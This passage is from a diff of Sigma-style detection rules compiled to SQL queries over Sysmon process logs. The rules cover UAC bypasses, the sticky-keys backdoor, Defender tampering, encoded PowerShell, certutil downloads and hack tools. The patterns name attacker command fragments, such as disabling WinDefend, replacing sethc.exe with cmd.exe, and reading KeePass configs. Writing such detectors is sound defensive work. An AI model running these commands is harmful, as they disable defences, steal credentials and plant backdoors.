'\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE 
'%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image 
LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session 
without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian 
Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or 
folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": 
"Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' 
--dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - 
"attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + 
"description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 
'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], 